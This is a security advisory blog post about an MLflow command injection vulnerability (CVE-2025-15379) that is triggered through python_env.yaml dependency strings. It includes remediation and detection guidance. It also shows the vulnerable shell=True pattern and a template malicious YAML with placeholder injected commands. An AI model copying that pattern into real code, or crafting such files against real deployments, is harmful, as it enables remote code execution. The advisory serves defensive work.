Skip to main content
COSMICBYTEZLABS
NewsSecurityHOWTOsToolsStudyTraining
ProjectsChecklistsAI RankingsNewsletterStatusTagsAbout
Subscribe

Press Enter to search or Esc to close

News
Security
HOWTOs
Tools
Study
Training
Projects
Checklists
AI Rankings
Newsletter
Status
Tags
About
RSS Feed
Reading List
Subscribe

Stay in the Loop

Get the latest security alerts, tutorials, and tech insights delivered to your inbox.

Subscribe NowFree forever. No spam.
COSMICBYTEZLABS

Your trusted source for IT intelligence, cybersecurity insights, and hands-on technical guides.

465+ Articles
115+ Guides

CONTENT

  • Latest News
  • Security Alerts
  • HOWTOs
  • Projects
  • Exam Prep

RESOURCES

  • Search
  • Browse Tags
  • Newsletter Archive
  • Reading List
  • RSS Feed

COMPANY

  • About Us
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CosmicBytez Labs. All rights reserved.

System Status: Operational
  1. Home
  2. Security
  3. CVE-2025-15379: MLflow Command Injection in Model Serving (CVSS 10.0)
CVE-2025-15379: MLflow Command Injection in Model Serving (CVSS 10.0)

Critical Security Alert

This vulnerability is actively being exploited. Immediate action is recommended.

SECURITYCRITICALCVE-2025-15379

CVE-2025-15379: MLflow Command Injection in Model Serving (CVSS 10.0)

A maximum-severity command injection vulnerability in MLflow's model serving container initialization allows attackers to execute arbitrary OS commands via a maliciously crafted python_env.yaml dependency file when deploying models with env_manager=LOCAL.

Dylan H.

Security Team

March 30, 2026
7 min read

Affected Products

  • MLflow model serving (env_manager=LOCAL) — all unpatched versions

Executive Summary

CVE-2025-15379 is a maximum-severity (CVSS 10.0) command injection vulnerability in the MLflow open-source machine learning platform. The flaw resides in the _install_model_dependencies_to_env() function, which is invoked when deploying a model with env_manager=LOCAL. MLflow reads dependency specifications from the model artifact's python_env.yaml file and constructs a shell command to install them — without sanitizing the dependency strings before passing them to the OS.

An attacker who can supply a malicious python_env.yaml (e.g., via a compromised artifact, supply chain attack, or direct artifact upload) can achieve full remote code execution on the MLflow server or deployment target.

CVSS Score: 10.0 (Critical — Maximum)


Vulnerability Overview

AttributeValue
CVE IDCVE-2025-15379
CVSS Score10.0 (Critical — Maximum)
TypeCommand Injection / Remote Code Execution
Attack VectorNetwork
Privileges RequiredNone
User InteractionNone
ScopeChanged
Confidentiality ImpactHigh
Integrity ImpactHigh
Availability ImpactHigh
Affected ComponentModel serving container initialization
Vulnerable Function_install_model_dependencies_to_env()
Trigger Conditionenv_manager=LOCAL model deployment
Payload Vectorpython_env.yaml dependency strings

Affected Products

ProductAffected VersionsRemediation
MLflow model serving (env_manager=LOCAL)All unpatched versionsApply vendor patch immediately

Technical Analysis

Root Cause

When deploying an MLflow model with env_manager=LOCAL, the platform calls _install_model_dependencies_to_env() to set up the runtime environment. This function reads the dependencies or build_dependencies fields from the model's python_env.yaml file and constructs a pip install command using those values.

The dependency strings are not sanitized before shell execution. An attacker can inject shell metacharacters — semicolons, backticks, $() substitution, or pipe characters — directly into the dependency specification to execute arbitrary commands.

Vulnerable Code Pattern (Conceptual)

The vulnerability arises when unsanitized user-controlled values from python_env.yaml are passed into a subprocess call that evaluates shell syntax:

# Pseudocode — the vulnerable pattern:
# dep_string = read from python_env.yaml (attacker-controlled)
# subprocess.run(["pip", "install", dep_string], shell=True)  <-- shell=True + unsanitized input

The safe pattern requires:

  1. Using shell=False with a list of arguments (never a concatenated string)
  2. Validating dependency strings against an allowlist regex before passing to subprocess
  3. Using a sandbox or virtualenv with restricted shell access

Malicious python_env.yaml Example

A crafted python_env.yaml designed to exploit this vulnerability would embed shell metacharacters into a dependency specification:

python_version: "3.10"
build_dependencies:
  - pip
dependencies:
  - "numpy; <injected-shell-command>"
  - "requests<shell-substitution-payload>"

When MLflow processes these dependency strings with shell=True, the injected content executes as a shell command on the host.

Attack Scenarios

Scenario 1: Compromised Model Registry

1. Attacker gains write access to MLflow artifact store (misconfigured S3, NFS, etc.)
2. Attacker modifies python_env.yaml in a widely-used model artifact
3. Any deployment with env_manager=LOCAL triggers command injection
4. Full RCE on the deployment server — credentials, environment variables, data exfiltrated

Scenario 2: Supply Chain via Model Hub

1. Attacker publishes a poisoned model to a public or shared model registry
2. Organization downloads and deploys the model with env_manager=LOCAL
3. _install_model_dependencies_to_env() executes attacker's injected commands
4. Complete compromise of the inference or training server

Scenario 3: Insider Threat in Multi-Tenant MLflow

1. Malicious data scientist uploads a model with a crafted python_env.yaml
2. MLOps engineer deploys the model using standard MLflow deployment commands
3. Command injection fires during environment setup — before model validation
4. MLOps server compromised, lateral movement into CI/CD or cloud environment

Scenario 4: CI/CD Pipeline Injection

1. MLflow is part of an automated training and deployment pipeline
2. A compromised training dataset or upstream dependency poisons python_env.yaml
3. Automated deployment triggers command injection without human review
4. Pipeline runner compromise cascades to production infrastructure

Why CVSS 10.0?

The maximum CVSS score reflects every factor being at maximum severity:

  • Attack Vector: Network — exploitable over the network
  • Privileges Required: None — no authentication needed if artifact store is accessible
  • User Interaction: None — no victim action required beyond normal model deployment
  • Scope: Changed — impact extends beyond MLflow to the host OS
  • All CIA impacts: High — full confidentiality, integrity, and availability compromise

Impact Assessment

Impact AreaDescription
Full Remote Code ExecutionArbitrary commands execute as the MLflow process user
Credential TheftAccess to environment variables, cloud credentials, API keys
Data ExfiltrationModel artifacts, training data, and IP accessible to attacker
Infrastructure PivotCompromise of deployment server enables lateral movement
Supply Chain RiskPoisoned models in public registries can compromise all downstream deployments
Persistent BackdoorsWrite access via RCE enables persistent attacker presence
Ransomware StagingModel serving servers often have access to datasets and storage

Remediation

Priority Action: Patch or Restrict Immediately

# Check your MLflow version
python -c "import mlflow; print(mlflow.__version__)"
 
# Upgrade to the patched version
pip install --upgrade mlflow
 
# Verify upgrade
python -c "import mlflow; print(mlflow.__version__)"

Avoid env_manager=LOCAL for Untrusted Artifacts

# Avoid env_manager=LOCAL when deploying untrusted or externally sourced models
import mlflow.pyfunc
 
# Instead of LOCAL (vulnerable):
# mlflow.pyfunc.serve(model_uri=model_uri, env_manager="local")
 
# Use conda or virtualenv isolation, or container-based deployment:
mlflow.pyfunc.serve(model_uri=model_uri, env_manager="conda")
 
# Or deploy via Docker container for full isolation:
# mlflow models build-docker -m model_uri -n my-model-image

Validate python_env.yaml Before Deployment

import yaml
import re
 
SAFE_PACKAGE_PATTERN = re.compile(r'^[a-zA-Z0-9_\-\.\[\]<>=!,\s]+$')
 
def validate_python_env(python_env_path):
    with open(python_env_path) as f:
        config = yaml.safe_load(f)
 
    for dep in config.get("dependencies", []):
        if not SAFE_PACKAGE_PATTERN.match(str(dep)):
            raise ValueError(f"Suspicious dependency string: {dep}")
 
    for dep in config.get("build_dependencies", []):
        if not SAFE_PACKAGE_PATTERN.match(str(dep)):
            raise ValueError(f"Suspicious build dependency: {dep}")
 
    return True

Container-Based Isolation

# Deploy MLflow models in isolated Docker containers
FROM python:3.10-slim
 
# Non-root user for container execution
RUN useradd -m -u 1000 mlflow
USER mlflow
 
# Limited network access — no outbound during inference
# Network policies enforced at orchestrator level
 
WORKDIR /app
COPY model/ ./model/
RUN pip install mlflow

Detection Indicators

IndicatorDescription
Unexpected outbound network connections during model deploymentPotential exploitation (shell callback)
Unusual processes spawned by MLflow service accountCommand injection execution
New files in /tmp, cron directories, or home directoriesPost-exploitation activity
python_env.yaml files containing shell metacharacters (;, `, $())Malicious artifact indicator
pip install commands with semicolons or command substitution in package namesAttack attempt
MLflow deployment failures with unusual error messages during env setupAttempted injection blocked

Post-Remediation Checklist

  1. Patch all MLflow installations to the version containing the fix
  2. Audit python_env.yaml files in all registered model artifacts — check for injected commands
  3. Review deployment logs — look for unexpected command execution during recent model deployments
  4. Assume breach if env_manager=LOCAL was used with externally sourced models — conduct forensic review
  5. Rotate all credentials accessible to the MLflow deployment environment
  6. Implement artifact signing — cryptographically verify model artifact integrity before deployment
  7. Switch to container deployment — use mlflow models build-docker for isolation
  8. Restrict artifact store write access — limit who can upload or modify model artifacts

References

  • NVD — CVE-2025-15379
  • MLflow GitHub Repository
  • OWASP — Command Injection
  • Related: CVE-2025-15036 — MLflow Path Traversal in Archive Extraction (CVSS 9.6)
#CVE-2025-15379#MLflow#Command Injection#RCE#Remote Code Execution#Model Serving#Machine Learning Security#NVD

Related Articles

CVE-2025-15036: MLflow Path Traversal in Archive Extraction

A critical path traversal vulnerability in MLflow's extract_archive_to_dir function allows attackers to write arbitrary files outside the intended extraction directory via maliciously crafted tar archives. Affects all versions before v3.7.0.

6 min read

CVE-2026-33478: AVideo CloneSite Plugin Unauthenticated RCE (CVSS 10.0)

A critical chain of vulnerabilities in WWBN AVideo's CloneSite plugin allows fully unauthenticated attackers to achieve remote code execution via key...

4 min read

Tenda A15 UploadCfg Stack Buffer Overflow (CVE-2026-4567)

A CVSS 9.8 Critical stack-based buffer overflow in Tenda A15 firmware 15.13.07.13 allows unauthenticated remote attackers to execute arbitrary code by...

5 min read
Back to all Security Alerts